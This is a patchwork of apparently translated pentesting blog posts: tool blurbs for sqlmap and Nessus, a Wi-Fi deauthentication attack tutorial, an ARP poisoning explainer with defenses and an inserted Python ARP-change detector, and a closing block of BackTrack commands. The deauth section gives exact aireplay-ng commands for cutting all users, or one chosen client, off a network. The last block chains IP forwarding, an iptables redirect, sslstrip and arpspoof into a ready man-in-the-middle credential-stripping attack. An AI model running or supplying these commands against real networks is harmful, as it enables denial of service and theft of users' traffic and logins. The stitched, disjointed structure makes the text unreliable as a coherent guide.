sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches, ranging from database fingerprinting, through fetching data from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
Nessus: For security professionals who evaluate complex business networks for security breaches and compliance issues, Nessus is the world's most widely deployed vulnerability and configuration assessment product. With over five million downloads to date, Nessus features high-speed discovery, configuration auditing, asset profiling, sensitive data discovery, patch management integration, and vulnerability analysis of your security posture. Nessus scanners can be distributed throughout the enterprise, in DMZs, and across physically separated networks. Nessus is supported by a world-renowned research team and has the largest vulnerability knowledge base, making it suitable for the most complex environments.
Source: http://www.tenable.com/products/nessus
Video tutorial:
http://www.youtube.com/watch?v=HrKoHx7LuZM&feature=plcp
Nessus commands:
nessus_admin                 nessus_save
nessus_connect               nessus_scan_new
nessus_db_scan               nessus_scan_pause
nessus_help                  nessus_scan_pause_all
nessus_index                 nessus_scan_resume
nessus_logout                nessus_scan_resume_all
nessus_plugin_details        nessus_scan_status
nessus_plugin_family         nessus_scan_stop
nessus_plugin_list           nessus_scan_stop_all
nessus_plugin_prefs          nessus_server_feed
nessus_policy_del            nessus_server_prefs
nessus_policy_list           nessus_server_status
nessus_report_del            nessus_template_list
nessus_report_get            nessus_user_add
nessus_report_host_detail    nessus_user_del
nessus_report_host_ports     nessus_user_list
nessus_report_hosts          nessus_user_passwd
nessus_report_list
To see what a command does, just enter its name at the msf prompt, for example:
msf> nessus_connect
[*] Usage:
[*]        nessus_connect username:password@hostname:port <ssl ok>
[*]        Example:> nessus_connect msf:msf@192.168.1.10:8834 ok
[*]        OR
[*]        nessus_connect username@hostname:port <ssl ok>
[*]        Example:> nessus_connect msf@192.168.1.10:8834 ok
[*]        OR
[*]        nessus_connect hostname:port <ssl ok>
[*]        Example:> nessus_connect 192.168.1.10:8834 ok
[*]        OR
[*]        nessus_connect
[*]        Example:> nessus_connect
[*] This only works after you have saved creds with nessus_save
msf>
In this tutorial I show how to knock over a wireless network by performing a DDoS. For this we will need a wireless card that supports wireless auditing, like the one we used to crack WEP networks; we will also need aireplay and, above all, Linux, hehe. Here I leave the explanation of how to carry out the DDoS manually against a network connection, and below I leave a script.sh that automates this attack. Greetings, I await your responses.
1-We put the network card in monitor mode with the command: airmon-ng start wlan0
2-We look up the access point's channel and set the monitor interface to that channel with the command: airmon-ng mon0 -c 5, where 5 is the channel number and mon0 is the interface.
3-If we want to knock down the entire wireless network, we send deauthentication packets on behalf of the access point. With this command we knock down the whole wireless network, leaving all the users connected to it without internet: aireplay-ng -0 0 -a 00:11:22:33:44:55 mon0, where 00:11:22:33:44:55 would be the MAC address of the access point and mon0 the wireless network interface.
4-If we just want to knock down one client connected to the Wi-Fi network, we send deauthentication packets to that specific client. With this command we knock down that client, leaving it without internet: aireplay-ng -0 0 -a 00:11:22:33:44:55 -c 55:44:33:22:11:00 mon0, where 00:11:22:33:44:55 would be the MAC address of the access point, 55:44:33:22:11:00 would be the MAC address of the client, and mon0 the wireless network interface.
* Here I leave the script that automates this whole attack ...
ARP is a layer 2 (link layer) protocol. The ARP protocol is responsible for obtaining physical MAC addresses from IP addresses. In this type of network it is necessary to know the destination MAC so that the packet reaches only the corresponding network interface and not another.
As noted, the concept of ARP only makes sense if we are in the field of switched networks, otherwise it would not be necessary to know the destination MAC in the network.
ARP Poisoning
ARP spoofing, also known as ARP Poisoning or ARP Poison Routing, is a technique used to infiltrate a LAN.
How does it work?
The principle of ARP poisoning is to send fake (spoofed) ARP messages onto the Ethernet. Usually the aim is to associate the attacker's MAC address with the IP address of another node (the attacked node), such as the default gateway. Any traffic to the IP address of that node will be mistakenly sent to the attacker rather than to its actual destination. The attacker can then choose between forwarding the traffic to the actual default gateway (a passive attack, or listening) and modifying the data before forwarding it (an active attack). The attacker can even launch a DoS (Denial of Service) attack against a victim by associating a nonexistent MAC address with the IP address of the victim's default gateway.
Defense methods
One method to prevent ARP spoofing is the use of static ARP tables, i.e. adding static ARP entries so that there is no dynamic cache; each table entry maps a MAC address to its corresponding IP address. However, this is not a practical solution, especially in large networks.
In large networks it is preferable to use another method: DHCP snooping. Using DHCP, the network device keeps track of the MAC addresses that are connected to each port, so that it quickly detects if it receives ARP spoofing. This method is implemented in the network equipment of manufacturers such as Cisco, Extreme Networks and Allied Telesis.
Arpwatch is a Unix program that listens for ARP replies on the network and sends an email notification to the network administrator when an ARP entry changes.
RARP ("Reverse ARP") is the protocol used to look up, from a MAC address, its IP address. If, in response to a query, RARP returns more than one IP address, it means that MAC address has been cloned.
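The kind of change detection described for Arpwatch can be sketched as follows. This is an added example, not Arpwatch's code and not part of the original post: it parses raw ARP frames and reports when the MAC bound to an IP changes or flips back. The alert names, the ArpMonitor class and the sample frames are assumptions made up for the illustration.

```python
import struct

def parse_arp(frame: bytes):
    """Return sender fields of an Ethernet/IPv4 ARP frame, or None if it is not one."""
    if len(frame) < 42 or frame[12:14] != b"\x08\x06":       # EtherType 0x0806 = ARP
        return None
    htype, ptype, hlen, plen, oper = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    mac = lambda b: ":".join(f"{x:02x}" for x in b)
    return {"op": oper, "eth_src": mac(frame[6:12]),
            "sender_mac": mac(frame[22:28]),
            "sender_ip": ".".join(map(str, frame[28:32]))}

class ArpMonitor:
    """Tracks IP -> MAC bindings and reports changes (alert names are this example's own)."""
    def __init__(self):
        self.current = {}    # ip -> MAC currently bound to it
        self.previous = {}   # ip -> MAC it was bound to before the last change

    def observe(self, frame: bytes):
        arp = parse_arp(frame)
        if arp is None:
            return []
        ip, mac, alerts = arp["sender_ip"], arp["sender_mac"], []
        if arp["eth_src"] != mac:        # Ethernet source and ARP sender disagree
            alerts.append(("src-mismatch", ip, arp["eth_src"], mac))
        if ip == "0.0.0.0":              # ARP probe: carries no binding to record
            return alerts
        old = self.current.get(ip)
        if old is not None and old != mac:
            kind = "flip-flop" if self.previous.get(ip) == mac else "changed"
            alerts.append((kind, ip, old, mac))
            self.previous[ip] = old
        self.current[ip] = mac
        return alerts

# Constructed sample frames: ARP replies sent to 192.168.1.50 that claim 192.168.1.1.
_TMPL = "66778899aabb{m}08060001080006040002{m}c0a8010166778899aabbc0a80132"
SAMPLES = [bytes.fromhex(_TMPL.format(m=m))
           for m in ("001122334455", "deadbeef0001", "001122334455")]

def run(frames):
    monitor = ArpMonitor()
    return [alert for f in frames for alert in monitor.observe(f)]

if __name__ == "__main__":
    for alert in run(SAMPLES):
        print(alert)
```

On the sample frames the gateway address 192.168.1.1 is first seen with one MAC, then with a different one, then with the first again, so the monitor reports a change followed by a flip-flop.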
BackTrack commands:
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1000
sslstrip -p -l 1000
(in another window)
tail -f sslstrip.log
arpspoof -i wlan0 -t IP gateway